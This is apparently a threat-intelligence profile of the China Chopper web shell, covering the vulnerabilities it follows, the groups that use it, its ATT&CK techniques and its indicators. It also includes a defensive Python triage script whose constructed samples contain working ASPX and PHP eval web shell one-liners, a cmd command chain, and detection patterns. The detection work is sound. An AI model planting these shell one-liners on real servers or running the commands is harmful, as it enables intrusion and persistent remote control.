China Chopper
China Chopper is a widely used and widely shared web shell, typically deployed on compromised web servers to provide remote access and control. It operates in a client/server model and is commonly used in web application attacks. The server component executes code sent via HTTP POST requests and has been described as enabling threat actors to transfer and create files, open a command terminal, interact with database servers, spider authentication portals, and change file timestamps. Observed variants include ASPX and PHP implementations, including one-line eval-style shells and a .NET-based variant embedded as a malicious Umbraco CMS module that decoded Base64 data multiple times and dynamically executed JavaScript to provide China Chopper-like functionality.
The malware has been observed following exploitation of public-facing applications and servers, including Microsoft Exchange and SharePoint, WildFly/JBoss, Umbraco CMS, Adobe ColdFusion, and phpMyAdmin/MariaDB log-poisoning scenarios. It has been associated with exploitation of CVE-2019-0604 on SharePoint; with the March 2021 Exchange (ProxyLogon) vulnerabilities CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065 and the ProxyShell chain CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207; and with telemetry around CVE-2023-26360 in Adobe ColdFusion. In Exchange incidents, China Chopper web shells were commonly found as ASPX files under IIS and Exchange paths such as \inetpub\wwwroot\aspnet_client\ and the FrontEnd\HttpProxy directories.
Multiple threat actors and clusters have used China Chopper, and the content explicitly notes it is not unique to any one group. Reported users include GALLIUM, Tropic Trooper, DragonSpark, BRONZE UNION / TG-3390, BRONZE PRESIDENT, Flax Typhoon, APT41 / Wicked Panda, and Iranian actor Pioneer Kitten / UNC757; it has also been referenced in activity linked to Chinese state-sponsored or China-nexus operations more broadly. Associated follow-on malware and tooling mentioned alongside China Chopper include PlugX, ShadowPad, HyperBro, Gh0st RAT, Poison Ivy, Crowdoor, Cobalt Strike, SparkRAT, Metasploit, Mimikatz, SoftEther VPN, Neo-reGeorg, ByPassGodzilla, Fscan, Swor, and AntSword.
High-confidence behavioral indicators include the virtual terminal request sequence "&echo [S]&cd&echo [E]" sent by the client around each command, ASPX web shell code containing eval(Request.Item["|"],"unsafe") with the "|" HTTP parameter carrying the payload, and filenames such as error404.aspx. In one campaign, 37 .NET web shell samples matched the filename pattern App_Web_[a-z0-9]{8}.dll. China Chopper has also been used to stage encrypted archives on compromised internet-facing servers prior to exfiltration. Overall, the content characterizes China Chopper as a common post-exploitation web shell used for persistence, command execution, file operations, credential-access support, lateral movement enablement, staging, and long-term access on compromised web infrastructure.
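The following is an added triage example, not code from the original page or from any vendor report it cites. It turns the indicators above into checks a responder can run over two kinds of evidence: URL-encoded POST bodies recovered from IIS/Apache logs or a proxy capture (looking for the "&echo [S]&cd&echo [E]" terminal marker both in the clear and under one or more Base64 layers, as in the Umbraco module's repeated decoding), and files under a web root (looking for the eval(Request.Item[...],"unsafe") and PHP eval one-liners, the error404.aspx name, the Exchange drop directories, and the App_Web_ assembly pattern). All request bodies, paths and file contents are constructed; the z0/z1/z2 parameter names follow public descriptions of the PHP client's traffic, and the double Base64 layer on z2 is constructed to exercise the peeler.

```python
# Added triage example (not from the original page or any vendor report):
# applies the China Chopper indicators described above to request bodies and
# web-root files. All sample data below is constructed for illustration.
from __future__ import annotations

import base64
import binascii
import re
from urllib.parse import parse_qs, unquote_plus, urlencode

# Virtual-terminal marker the China Chopper client wraps around commands.
TERMINAL_MARKER = "&echo [S]&cd&echo [E]"
# One-line JScript ASPX shell; the parameter name ("|" in Exchange incidents,
# "password" in the classic sample) varies, so it is a wildcard.
ASPX_EVAL_RE = re.compile(
    r'eval\s*\(\s*Request\.Item\[\s*"[^"]*"\s*\]\s*,\s*"unsafe"\s*\)', re.I)
# PHP one-liner: eval of a request parameter, optionally Base64-wrapped.
PHP_EVAL_RE = re.compile(
    r"@?eval\s*\(\s*(?:base64_decode\s*\(\s*)?\$_(?:POST|REQUEST|GET)\[", re.I)
# Directories where Exchange responders found the shells (weak alone: legitimate
# .aspx pages live under FrontEnd\HttpProxy too), plus the reported shell name.
EXCHANGE_DROP_PATHS = ("\\inetpub\\wwwroot\\aspnet_client\\", "\\frontend\\httpproxy\\")
KNOWN_SHELL_NAMES = {"error404.aspx"}
# Compiled-assembly name pattern from the .NET campaign; legitimate ASP.NET
# temporary files match it as well, so it is only a weak signal.
ASPNET_ASSEMBLY_RE = re.compile(r"^App_Web_[a-z0-9]{8}\.dll$", re.I)


def peel_base64(text: str, max_layers: int = 5) -> str:
    """Strip nested Base64 layers while each decode yields printable text
    (the Umbraco module decoded its payload several times before eval)."""
    current = text.strip()
    for _ in range(max_layers):
        try:
            decoded = base64.b64decode(current, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            break
        if not decoded or not all(c.isprintable() or c in "\r\n\t" for c in decoded):
            break
        current = decoded.strip()
    return current


def inspect_request(body: str) -> list[str]:
    """Indicator names hit by one URL-encoded POST body."""
    hits = []
    if TERMINAL_MARKER in unquote_plus(body):
        hits.append("terminal-marker-plain")
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            peeled = peel_base64(value)
            if peeled != value.strip() and TERMINAL_MARKER in peeled:
                hits.append(f"terminal-marker-base64:{name}")
    return hits


def inspect_file(path: str, content: str) -> list[str]:
    """Indicator names hit by one file; weak signals carry a 'weak:' prefix."""
    hits = []
    if ASPX_EVAL_RE.search(content):
        hits.append("aspx-eval-unsafe")
    if PHP_EVAL_RE.search(content):
        hits.append("php-eval-post")
    normalized = path.lower().replace("/", "\\")
    name = normalized.rsplit("\\", 1)[-1]
    if name in KNOWN_SHELL_NAMES:
        hits.append("known-shell-filename")
    if name.endswith(".aspx") and any(p in normalized for p in EXCHANGE_DROP_PATHS):
        hits.append("weak:aspx-in-exchange-drop-path")
    if ASPNET_ASSEMBLY_RE.match(name):
        hits.append("weak:app_web-assembly-name")
    return hits


def b64enc(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


COMMAND = r"cd /d C:\inetpub\wwwroot&whoami&echo [S]&cd&echo [E]"
# Constructed bodies: ASPX client (command in clear), PHP client (z0..z2 names
# from public traffic descriptions; z2 wrapped twice on purpose), and benign.
SAMPLE_REQUESTS = {
    "aspx": urlencode({"|": 'var c=new System.Diagnostics.ProcessStartInfo("cmd");'
                            f'c.Arguments="/c {COMMAND}";'}),
    "php": urlencode({"password": "@eval(base64_decode($_POST[z0]));",
                      "z0": b64enc('@ini_set("display_errors","0");'),
                      "z1": b64enc("cmd"), "z2": b64enc(b64enc(COMMAND))}),
    "benign": urlencode({"user": "alice", "action": "list", "note": "echo off"}),
}
# Constructed files: a dropped shell, a legitimate OWA page, a PHP one-liner.
SAMPLE_FILES = {
    r"C:\inetpub\wwwroot\aspnet_client\error404.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["|"],"unsafe");%>',
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx":
        '<%@ Page Language="C#" %><html><body>sign in</body></html>',
    "/var/www/html/uploads/img.php": "<?php @eval($_POST['pass']); ?>",
}

if __name__ == "__main__":
    for label, body in SAMPLE_REQUESTS.items():
        print(f"request {label}: {inspect_request(body)}")
    for path, content in SAMPLE_FILES.items():
        print(f"file {path}: {inspect_file(path, content)}")
```

The path and App_Web_ checks are deliberately marked weak: the legitimate OWA logon page in the sample sits in the same FrontEnd\HttpProxy tree as the shells did, and every compiled ASP.NET page produces an App_Web_xxxxxxxx.dll, so those hits only matter when baselined against a known-good file inventory or paired with a content hit. The terminal marker and the eval one-liners are the high-confidence signals; note that deleting the .aspx after use (as reported above) removes the file hits but not the request-body hits already in the web server logs.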
Vulnerabilities exploited
17 CVEs Mallory has correlated with this family across public research and vendor advisories.
In our telemetry, we noticed exploitation attempts of several CVEs (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 in Microsoft Exchange, CVE-2023-26360 in Adobe ColdFusion). Therefore, we believe with moderate confidence that these web shells were dropped by exploiting an existing unpatched vulnerability. According to our telemetry, the newly discovered web shell was also associated with a campaign leveraging CVE-2023-26360 early this year targeting vulnerable servers in the Middle East. | The infection came to our attention in June 2024, when our telemetry gave recurring alerts for a new China Chopper web shell variant... The resulting code resembles the known functionality associated with the China Chopper web shell, a popular web shell used by attackers for remote access and control over compromised web servers.
CVE-2019-0604 Vulnerable Products: Microsoft SharePoint Associated Malware: China Chopper Mitigation: Update affected Microsoft products with the latest security patches
CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 allow for remote code execution. CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary write file vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server.
Microsoft has released out-of-band security updates to address four vulnerabilities in Exchange Server: CVE-2021-26855 allows an unauthenticated attacker to send arbitrary HTTP requests and authenticate as the Exchange Server. The vulnerability exploits the Exchange Control Panel (ECP) via a Server-Side Request Forgery (SSRF).
CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 allow for remote code execution... CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as SYSTEM on the Exchange Server.
The threat actor primarily gained initial access by compromising a Citrix NetScaler remote access server using a publicly available exploit for CVE-2019-19781.
The threat actors then used BEHINDER to install the China Chopper web shell and a simple file upload tool as backups.
PHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by APT40.
"In summer 2018, threat actors were observed targeting public-facing web servers that were vulnerable to CVE-2017-3066. The activity was related to a vulnerability in the web application development platform Adobe ColdFusion, which enabled remote code execution."
Threat actors are actively exploiting a recently disclosed critical vulnerability, tracked as CVE-2026-1731 (CVSS score: 9.9), in BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA). The bug could allow an unauthenticated attacker to send specially crafted requests and run operating system commands remotely, without logging in.
Groups observed using it
16 distinct threat actors attributed by public researchers.
"China Chopper Commonly used and widely shared web shell used by several threat actors. Not unique to GALLIUM."
Microsoft Exchange Incident “China Chopper” ASPX Webshell filenames ... Unit 42 Analyzing Attacks Against Microsoft Exchange Server With China Chopper Webshells
The group uses a variety of TTPs including but not limited to LoTL tactics, phishing, ransomware, cryptocurrency mining, supply chain attacks, China Chopper, Gh0st RaT, PlugX, HighNoon, Derusbi, BioPass RAT, RedXOR, and ShadowPad.
Threat Group-3390 has moved staged encrypted archives to Internet-facing servers that had previously been compromised with China Chopper prior to exfiltration.
Techniques & procedures
21 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique
China Chopper is commonly used by Chinese threat actors, which are known to deploy the webshell through different vectors, such as exploiting web server vulnerabilities, cross-site scripting, or SQL injections. | We observed compromises of web servers and MySQL database servers exposed to the Internet as initial indicators of the DragonSpark attacks.
Execution
4 techniques
__Render__control1() is the main malicious function... a Base64 string is decoded and then executed via dynamic evaluation using JavaScript.
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
U.S. Government reporting has identified the top 10 most exploited vulnerabilities by state, nonstate, and unattributed cyber actors from 2016 to 2019 as follows: CVE-2017-11882, CVE-2017-0199, CVE-2017-5638, CVE-2012-0158, CVE-2019-0604, CVE-2017-0143, CVE-2018-4878, CVE-2017-8759, CVE-2015-1641, and CVE-2018-7600.
Persistence
2 techniques
Stealth
3 techniques
The module exhibits characteristics commonly associated with malicious activity, including obfuscation and dynamic execution of commands... a Base64 string is decoded and then executed via dynamic evaluation using JavaScript.
Once the attackers gained access to the network, they deleted the .aspx webshell file to cover their tracks
APT28 has performed timestomping on victim files. APT29 has used timestomping to alter the Standard Information timestamps on their web shells to match other files in the same directory. APT32 has used scheduled task raw XML with a backdated timestamp... APT38 has modified data timestamps to mimic files that are in the same folder on a compromised host.
Discovery
4 techniques
Adding attack.discovery since the rule already has tags t1018, t1033 & t1087.
The content repeatedly describes threat actors and malware performing network scanning, port scanning, service enumeration, OS fingerprinting, and identifying open ports/services across victim environments.
The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").
Collection
1 technique
Command and Control
4 techniques
BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control (C2) and operational infrastructure. The threat actors also integrate infrastructure they likely previously compromised for espionage purposes.
The content repeatedly describes threat actors and malware using HTTP and HTTPS for command and control, such as: "Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests."
Webshells are utilized for the following purposes: To use as a relay point to issue commands to hosts inside the network without direct internet access;
GALLIUM relies on web shells to gain persistence within a target's network and to drop their second stage malware payloads instead of first stage installers... This tool can be used by the attackers for a variety of purposes and tasks including ... exfiltrating and dropping files.
IOCs tracked for this family
39 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
81 sources tracked across advisories, community write-ups, and news.
A web shell/backdoor cited as a commonly reused tool in Chinese state-sponsored intrusions, especially relevant to external-facing server compromise.
Web shell family referenced as a tooling marker; used for remote command execution and as a C2/access mechanism via web server compromise.
A lightweight web shell used for remote access and control of compromised web servers, commonly used for initial foothold and persistent access.